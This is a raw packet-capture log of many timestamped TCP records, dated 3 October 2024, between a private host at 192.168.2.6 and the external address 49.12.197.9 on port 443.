                                                                                                                                                                  Oct 3, 2024 03:36:18.126955986 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.126976013 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.127012968 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.192399025 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.192418098 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.192518950 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.192533970 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.192573071 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.225634098 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.225653887 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.225790977 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.225802898 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.225835085 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.258606911 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.258630037 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.258748055 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.258759022 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.258807898 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.288316011 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.288336039 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.288436890 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.288449049 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.288490057 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.306829929 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.306848049 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.306945086 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.306952953 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.306996107 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.324242115 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.324261904 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.324338913 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.324347019 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.324384928 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.341396093 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.341417074 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.341491938 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.341504097 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.341550112 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.355856895 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.355927944 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.355978966 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.356009960 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.356024981 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.356054068 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.372554064 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.372605085 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.372658014 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.372668028 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.372698069 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.372716904 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.385797024 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.385850906 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.385905981 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.385921001 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.385935068 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.385970116 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.400552988 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.400604010 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.400650978 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.400671959 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.400703907 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.400713921 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.411834002 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.411878109 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.411931038 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.411938906 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.411967039 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.411989927 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.420324087 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.420372009 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.420422077 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.420432091 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.420459986 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.420478106 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.429898977 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.429948092 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.430002928 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.430011034 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.430039883 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.430052996 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.438523054 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.438544035 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.438616991 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.438628912 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.438664913 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.445452929 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.445470095 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.445584059 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.445594072 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.445637941 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.456468105 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.456499100 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.456620932 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.456630945 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.456674099 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.470177889 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.470222950 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.470283985 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.470294952 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.470325947 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.470345974 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.774363041 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.774409056 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.774524927 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.774569035 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.774624109 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.774624109 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.789108038 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.789160013 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.789280891 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.789318085 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.789355993 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.789377928 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.790509939 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.790551901 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.790610075 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.790623903 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.790656090 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.790677071 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.798306942 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.798369884 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.798405886 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.798413992 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.798445940 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.798455000 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.817404032 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.817466021 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.817565918 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.817575932 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.817634106 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.830030918 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.830075979 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.830193996 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.830219030 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.830243111 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.830270052 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.842443943 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.842494011 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.842627048 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.842653036 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.842708111 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.851336956 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.851382017 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.851495981 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.851511955 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.851560116 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.851581097 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.861175060 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.861248970 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.861351967 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.861366987 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.861422062 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.876096964 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.876143932 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.876250029 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.876267910 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.876292944 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.876312971 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.877266884 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.877306938 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.877345085 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.877357006 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.877382994 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.877402067 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.885235071 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.885281086 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.885426044 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.885446072 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.885474920 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.885499001 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.904876947 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.904896975 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.905061960 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.905093908 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.905141115 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.916763067 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.916809082 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.916882038 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.916889906 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.916945934 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.916945934 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.929070950 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.929094076 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.929218054 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.929231882 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.929275036 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.938122988 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.938184023 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.938273907 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.938302040 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.938324928 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.938344002 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.948370934 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.948426962 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.948539972 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.948556900 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.948615074 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.948616028 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.963676929 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.963743925 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.963936090 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.963937044 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.963993073 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.964057922 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.964356899 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.964406013 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.964437008 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.964449883 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.964478016 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.964504004 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.971728086 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.971751928 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.971832037 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.971839905 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.971870899 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.971888065 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.991838932 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.991871119 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.991993904 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:18.992006063 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:18.992053032 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.003633976 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.003659010 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.003740072 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.311985970 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.312050104 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.312056065 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.312083006 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.312098980 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.320928097 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.320945024 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.321037054 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.321043968 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.321084976 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.339006901 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.339021921 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.339106083 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.339122057 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.339165926 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.350910902 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.350935936 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.351027966 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.351039886 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.351080894 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.363341093 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.363357067 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.363451004 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.363459110 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.363501072 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.372534037 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.372558117 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.372714996 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.372751951 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.372801065 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.383730888 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.383752108 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.383908033 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.383923054 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.383977890 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.397913933 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.397933006 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.398025990 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.398039103 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.398094893 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.398646116 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.398663998 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.398749113 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.398761988 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.398817062 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.408077955 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.408092976 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.408250093 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.408257008 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.408303976 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.425776005 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.425793886 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.425955057 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.425971031 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.426054955 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.437850952 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.437868118 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.438152075 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.438165903 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.438298941 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.455559969 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.455575943 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.455887079 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.455903053 CEST4434973849.12.197.9192.168.2.6
                                                                                                                                                                  Oct 3, 2024 03:36:19.455981016 CEST49738443192.168.2.649.12.197.9
                                                                                                                                                                  Oct 3, 2024 03:36:19.465925932 CEST4434973849.12.197.9192.168.2.6
